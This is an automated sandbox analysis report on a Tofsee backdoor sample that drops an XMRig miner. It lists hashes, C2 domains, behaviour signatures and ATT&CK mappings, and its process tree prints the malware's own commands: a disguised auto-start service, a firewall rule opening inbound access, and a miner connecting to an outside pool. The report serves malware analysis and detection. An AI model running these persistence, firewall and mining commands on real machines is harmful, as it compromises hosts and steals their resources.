Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    18-10-2021 12:35

General

  • Target

    f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe

  • Size

    344KB

  • MD5

    f3baa4ed45dc9d0b254f70e6e4b0ac0f

  • SHA1

    b3aa03c4bebf4d65227f54f2cafd1e50daa8aebe

  • SHA256

    16fdbb6f45f722fffffafa455e8c5dd268c895e6b050031f40ab557be5240332

  • SHA512

    13d2af499e0ae5819ced2d9086926dbd73259efa24e64705651899f6f1d730e8ed0b36d3438d4271a9254979f132523a3fb9f0994bb77a2a1d2105618f0bbb4a

Malware Config

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe
    "C:\Users\Admin\AppData\Local\Temp\f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ulycubjm\
      2⤵
      PID:1784
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ujkqdoih.exe" C:\Windows\SysWOW64\ulycubjm\
      2⤵
      PID:1288
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create ulycubjm binPath= "C:\Windows\SysWOW64\ulycubjm\ujkqdoih.exe /d\"C:\Users\Admin\AppData\Local\Temp\f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:800
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description ulycubjm "wifi internet conection"
      2⤵
      PID:2872
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start ulycubjm
      2⤵
      PID:4024
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:3908
  • C:\Windows\SysWOW64\ulycubjm\ujkqdoih.exe
    C:\Windows\SysWOW64\ulycubjm\ujkqdoih.exe /d"C:\Users\Admin\AppData\Local\Temp\f3baa4ed45dc9d0b254f70e6e4b0ac0f.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1228
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:3624
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2288

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    New Service (T1050): 1
    Modify Existing Service (T1031): 1
    Registry Run Keys / Startup Folder (T1060): 1
  • Privilege Escalation
    New Service (T1050): 1
  • Defense Evasion
    Disabling Security Tools (T1089): 1
    Modify Registry (T1112): 2
  • Discovery
    System Information Discovery (T1082): 1

Downloads

  • C:\Users\Admin\AppData\Local\Temp\ujkqdoih.exe
    MD5
    f01c561073129227a8ea37d0d22941d9
    SHA1
    ee34637aba8f21cd9c23129c891f0fb658e729df
    SHA256
    27c92c2a4371efb7dba1f0c8e6dd97d361b99708d95836db69002db15343c1b5
    SHA512
    64497e3bad29c298f9fd12cf73656705152cdb462986b899de738d1b50fb14e10d870f8b9ff7f1a48f9ba7eae3d6318556c6af3956e2dd226dccad0c36e84ffa

  • C:\Windows\SysWOW64\ulycubjm\ujkqdoih.exe
    MD5
    f01c561073129227a8ea37d0d22941d9
    SHA1
    ee34637aba8f21cd9c23129c891f0fb658e729df
    SHA256
    27c92c2a4371efb7dba1f0c8e6dd97d361b99708d95836db69002db15343c1b5
    SHA512
    64497e3bad29c298f9fd12cf73656705152cdb462986b899de738d1b50fb14e10d870f8b9ff7f1a48f9ba7eae3d6318556c6af3956e2dd226dccad0c36e84ffa

  • memory/800-121-0x0000000000000000-mapping.dmp
  • memory/1228-126-0x0000000000A81000-0x0000000000A91000-memory.dmp
    Filesize 64KB
  • memory/1228-132-0x0000000000400000-0x0000000000788000-memory.dmp
    Filesize 3.5MB
  • memory/1228-131-0x0000000000790000-0x00000000008DA000-memory.dmp
    Filesize 1.3MB
  • memory/1288-119-0x0000000000000000-mapping.dmp
  • memory/1500-117-0x0000000000400000-0x0000000000788000-memory.dmp
    Filesize 3.5MB
  • memory/1500-116-0x00000000001E0000-0x00000000001F3000-memory.dmp
    Filesize 76KB
  • memory/1784-118-0x0000000000000000-mapping.dmp
  • memory/2288-138-0x0000000000C40000-0x0000000000D31000-memory.dmp
    Filesize 964KB
  • memory/2288-137-0x0000000000CD259C-mapping.dmp
  • memory/2288-133-0x0000000000C40000-0x0000000000D31000-memory.dmp
    Filesize 964KB
  • memory/2872-122-0x0000000000000000-mapping.dmp
  • memory/3624-128-0x0000000000A39A6B-mapping.dmp
  • memory/3624-130-0x0000000000740000-0x0000000000741000-memory.dmp
    Filesize 4KB
  • memory/3624-129-0x0000000000740000-0x0000000000741000-memory.dmp
    Filesize 4KB
  • memory/3624-127-0x0000000000A30000-0x0000000000A45000-memory.dmp
    Filesize 84KB
  • memory/3908-124-0x0000000000000000-mapping.dmp
  • memory/4024-123-0x0000000000000000-mapping.dmp